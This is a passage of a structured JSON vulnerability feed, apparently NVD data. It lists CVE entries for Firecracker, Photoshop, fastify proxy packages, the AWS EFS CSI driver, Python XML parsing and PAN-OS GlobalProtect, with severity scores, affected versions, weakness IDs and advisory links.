*","matchCriteriaId":"9EE4F8AE-21D2-4815-85B7-B7ECCC0D5059"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta6:*:*:*:node.js:*:*","matchCriteriaId":"D195760C-7DD9-4259-9042-EDE65AEAC1D6"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta7:*:*:*:node.js:*:*","matchCriteriaId":"B370859F-24D3-4B25-B580-1A5B6DB94BFE"}]}]}],"references":[{"url":"https://github.com/electron/electron/security/advisories/GHSA-9wfr-w7mm-pc7f","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-5747","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-04-08T00:16:05.657","lastModified":"2026-06-01T12:52:52.287","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. 
Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations.\n\nTo remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later."}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","pri
vilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":0.8,"impactScore":6.0}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-369"},{"lang":"en","value":"CWE-787"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:*:*:*:*:*:*:*:*","versionStartIncluding":"1.13.0","versionEndIncluding":"1.14.3","matchCriteriaId":"4662887D-1027-4734-9918-3E477F871CC8"},{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:1.15.0:-:*:*:*:*:*:*","matchCriteriaId":"B5F6B773-4741-4E73-9DFD-9AA3F640A224"},{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:firecracker:1.15.0:dev:*:*:*:*:*:*","matchCriteriaId":"D90FD91D-C30F-40F4-8138-9D1A3EA496D9"}]}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-015-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]},{"url":"https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-27289","sourceIdentifier":"psirt@adobe.com","published":"2026-04-14T20:16:34.140","lastModified":"2026-06-01T14:40:35.277","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Photoshop Desktop versions 27.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. 
An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Primary","description":[{"lang":"en","value":"CWE-125"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:photoshop:*:*:*:*:*:*:*:*","versionStartIncluding":"27.0","versionEndExcluding":"27.5","matchCriteriaId":"A030FA03-9A83-4835-98FB-F5542BB4B02A"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/photoshop/apsb26-40.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-33805","sourceIdentifier":"ce714d77-add3-4f53-aff5-83d477b104bb","published":"2026-04-15T11:16:34.990","lastModified":"2026-06-01T14:51:29.517","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"@fastify/reply-from v12.6.1 and earlier and @fastify/http-proxy v11.4.3 and earlier process the client's Connection header after the proxy has added its own headers via rewriteRequestHeaders. This allows attackers to retroactively strip proxy-added headers from upstream requests by listing them in the Connection header value. Any header added by the proxy for routing, access control, or security purposes can be selectively removed by a client. @fastify/http-proxy is also affected as it delegates to @fastify/reply-from. 
\n\nUpgrade to @fastify/reply-from v12.6.2 or @fastify/http-proxy v11.4.4 or later."}],"metrics":{"cvssMetricV40":[{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore"
:3.9,"impactScore":4.0}]},"weaknesses":[{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","description":[{"lang":"en","value":"CWE-644"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:fastify:fastify\\/http-proxy:*:*:*:*:*:node.js:*:*","versionEndExcluding":"11.4.4","matchCriteriaId":"E2043F2B-59EB-40CE-9B6D-F8AD357DD033"},{"vulnerable":true,"criteria":"cpe:2.3:a:fastify:reply-from:*:*:*:*:*:node.js:*:*","versionEndExcluding":"12.6.2","matchCriteriaId":"2EC6D95F-10D0-4E74-AF35-62CF6F597A50"}]}]}],"references":[{"url":"https://cna.openjsf.org/security-advisories.html","source":"ce714d77-add3-4f53-aff5-83d477b104bb","tags":["Vendor Advisory"]},{"url":"https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-gwhp-pf74-vj37","source":"ce714d77-add3-4f53-aff5-83d477b104bb","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-gwhp-pf74-vj37","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-6437","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-04-17T19:16:40.150","lastModified":"2026-06-01T13:06:25.717","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Improper neutralization of argument delimiters in the volume handling component in AWS EFS CSI Driver (aws-efs-csi-driver) before v3.0.1 allows remote authenticated users with PersistentVolume creation permissions to inject arbitrary mount options via comma injection.\n\n\n\n\nTo remediate this issue, users should upgrade to version 
v3.0.1"}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:H/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}]},"weaknesses":[{"source
":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-88"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:amazon:efs_csi_driver:*:*:*:*:*:kubernetes:*:*","versionEndExcluding":"3.0.1","matchCriteriaId":"6A6EA44D-2ECD-4CD5-91AD-2437511A009B"}]}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-016-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]},{"url":"https://github.com/kubernetes-sigs/aws-efs-csi-driver/releases/tag/v3.0.1","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Release Notes"]},{"url":"https://github.com/kubernetes-sigs/aws-efs-csi-driver/security/advisories/GHSA-mph4-q2vm-w2pw","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-7210","sourceIdentifier":"cna@python.org","published":"2026-05-11T18:16:42.413","lastModified":"2026-06-01T14:32:20.657","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\n\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this 
patch."}],"metrics":{"cvssMetricV40":[{"source":"cna@python.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"cna@python.org","type":"Secondary","descriptio
n":[{"lang":"en","value":"CWE-331"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:python:python:*:*:*:*:*:*:*:*","versionEndExcluding":"3.15.0","matchCriteriaId":"43B0671A-35BB-4EE4-8A68-E79B62A75547"}]}]}],"references":[{"url":"https://github.com/python/cpython/issues/149018","source":"cna@python.org","tags":["Issue Tracking"]},{"url":"https://github.com/python/cpython/pull/149023","source":"cna@python.org","tags":["Issue Tracking","Patch"]},{"url":"https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/","source":"cna@python.org","tags":["Mailing List","Third Party Advisory"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/11/13","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/11/8","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-0257","sourceIdentifier":"psirt@paloaltonetworks.com","published":"2026-05-13T19:17:01.040","lastModified":"2026-06-01T12:33:52.710","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allows the attacker to bypass security restrictions and establish an unauthorized VPN connection.\n\nPanorama and Cloud NGFW are not impacted by these 
issues."}],"metrics":{"cvssMetricV40":[{"source":"psirt@paloaltonetworks.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:A/V:D/RE:M/U:Red","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"ATTACKED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NO","Recovery":"AUTOMATIC","valueDensity":"DIFFUSE","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"RED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.2}]},"cisaExploitAdd":"2026-05-29","cisaActionDue":"2026-06-01","cisaRequiredAction":"Apply 
mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.","cisaVulnerabilityName":"Palo Alto Networks PAN-OS Authentication Bypass Vulnerability","weaknesses":[{"source":"psirt@paloaltonetworks.com","type":"Secondary","description":[{"lang":"en","value":"CWE-565"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionEndExcluding":"10.2.7","matchCriteriaId":"57F7F91D-1366-42D9-B106-B200D38D8A38"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:-:*:*:*:*:*:*","matchCriteriaId":"A8C42D98-CF8F-456B-9D57-80BBDC2C8E74"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"B3AAD4BA-22DD-43D3-91F1-8A6F5FBBF029"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"AA4994CB-6591-4B44-A5D7-3CDF540B97DE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h16:*:*:*:*:*:*","matchCriteriaId":"A6AB7874-FE24-42AC-8E3A-822A70722126"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h18:*:*:*:*:*:*","matchCriteriaId":"34B083B9-CC1B-43CD-9A16-C018F7FA2DDB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h19:*:*:*:*:*:*","matchCriteriaId":"0D88CC33-7E32-4E82-8A94-70759E910510"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h21:*:*:*:*:*:*","matchCriteriaId":"FA91A4E9-CE1E-4CB8-B717-4B0E314C0171"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h24:*:*:*:*:*:*","matchCriteriaId":"28994519-3519-4E94-8D8B-7C4251A82B8B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"776E06EC-2FDA-4664-AB43-9F6BE9B897CA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10
.2.7:h32:*:*:*:*:*:*","matchCriteriaId":"53981EA8-847F-4FBC-BA55-8EDF591E0FF8"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h6:*:*:*:*:*:*","matchCriteriaId":"CBE09375-A863-42FF-813F-C20679D7C45C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"1311961A-0EF6-488E-B0C2-EDBD508587C9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:*:*:*:*:*:*:*","matchCriteriaId":"78EAA309-2755-4ED2-9AFC-F4D9DF8F90D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:*:*:*:*:*:*:*","matchCriteriaId":"5D6D42C2-1CEC-47D2-82B2-1EFE71A8C8A3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:*:*:*:*:*:*","matchCriteriaId":"03C5ABF2-8C53-4376-8A64-6CB34E18E77C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*","matchCriteriaId":"FF7FCD8B-80DF-4004-A9D2-4EE884F089A6"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h12:*:*:*:*:*:*","matchCriteriaId":"83C9637A-B615-4CC2-84AA-BDCFE611484C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h14:*:*:*:*:*:*","matchCriteriaId":"224270A7-767D-433B-AD51-C031506747C1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h17:*:*:*:*:*:*","matchCriteriaId":"A532EFC6-A883-4279-8C05-9CD600B3F963"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h18:*:*:*:*:*:*","matchCriteriaId":"F4F20C02-DF90-4609-9254-B765481C83E0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"872BC747-512A-4872-AC86-E7F1DC589F47"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h21:*:*:*:*:*:*","matchCriteriaId":"E5E36C87-E01D-49DC-AB73-10E5EE27F596"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h27:*:*:*:*:*:*","matchCriteriaId":"39437442-B24D-492F-B637-2203492327FC"},{"vulnera
ble":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:*:*:*:*:*:*","matchCriteriaId":"67F527D0-F85B-4B83-AEA5-BA636FC89210"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h30:*:*:*:*:*:*","matchCriteriaId":"984BE1FB-ADB7-4831-AEDD-39DBAED078B0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h31:*:*:*:*:*:*","matchCriteriaId":"AF2C954D-9763-41E3-A132-F83C82E79BC0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"6CF8F985-7E51-49E6-857A-FAAF027F5611"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"B437DCEA-ABA3-41CA-B320-97EC430F1122"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:*:*:*:*:*:*","matchCriteriaId":"593AFE7A-CB37-4156-A2B8-646A317F3176"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:*:*:*:*:*:*","matchCriteriaId":"A9F032C2-3202-479B-8C70-277F6871A4A4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.11:*:*:*:*:*:*:*","matchCriteriaId":"3079F29C-688B-4FFB-BBC0-5FCD7B5B6905"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:*:*:*:*:*:*:*","matchCriteriaId":"674C85C5-162E-42DE-ACD1-D18943040E1C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:-:*:*:*:*:*:*","matchCriteriaId":"C2B871A6-0636-42A0-9573-6F693D7753AD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h1:*:*:*:*:*:*","matchCriteriaId":"F1FC63B8-B8D9-4EC1-85CA-2E12B38ACD3E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h10:*:*:*:*:*:*","matchCriteriaId":"F3F8462A-71C0-4F81-9882-C73BC90697CA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h16:*:*:*:*:*:*","matchCriteriaId":"C1B72E68-2D01-483F-BEC5-59C49E96B976"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h18:*:*:*:*:*:*","matchC
